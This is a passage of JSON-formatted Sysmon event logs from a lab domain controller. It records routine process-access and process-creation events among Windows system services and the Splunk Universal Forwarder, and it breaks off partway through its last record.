{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1937,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.786\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.786","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1938,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.786\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.786","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1939,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.786\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-106D-5F25-0000-0010A8DA0300}\r\nTargetProcessId: 3464\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.786","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-106D-5F25-0000-0010A8DA0300}","TargetProcessId":"3464","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1940,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.990\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001094C70200}\r\nTargetProcessId: 2916\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.990","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001094C70200}","TargetProcessId":"2916","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1941,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:17.990\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001094C70200}\r\nTargetProcessId: 2916\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:17.990","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001094C70200}","TargetProcessId":"2916","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1942,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.021\r\nSourceProcessGUID: {E2A3D6B1-106D-5F25-0000-0010A8DA0300}\r\nSourceProcessId: 3464\r\nSourceThreadId: 3940\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nTargetProcessId: 2792\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.021","SourceProcessGUID":"{E2A3D6B1-106D-5F25-0000-0010A8DA0300}","SourceProcessId":"3464","SourceThreadId":"3940","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","TargetProcessId":"2792","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1943,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.166\r\nProcessGuid: {E2A3D6B1-106E-5F25-0000-001009E00300}\r\nProcessId: 3880\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-strptime --log-warnings\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {E2A3D6B1-106D-5F25-0000-001067C70300}\r\nParentProcessId: 3896\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.166","ProcessGuid":"{E2A3D6B1-106E-5F25-0000-001009E00300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-strptime --log-warnings","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{E2A3D6B1-106D-5F25-0000-001067C70300}","ParentProcessId":"3896","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1944,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.161\r\nSourceProcessGUID: {E2A3D6B1-106D-5F25-0000-001067C70300}\r\nSourceProcessId: 3896\r\nSourceThreadId: 3920\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {E2A3D6B1-106E-5F25-0000-001009E00300}\r\nTargetProcessId: 3880\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+13671|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18192|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.161","SourceProcessGUID":"{E2A3D6B1-106D-5F25-0000-001067C70300}","SourceProcessId":"3896","SourceThreadId":"3920","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{E2A3D6B1-106E-5F25-0000-001009E00300}","TargetProcessId":"3880","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+13671|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+18192|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1945,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:18.161\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106E-5F25-0000-001009E00300}\r\nTargetProcessId: 3880\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:18.161","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106E-5F25-0000-001009E00300}","TargetProcessId":"3880","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 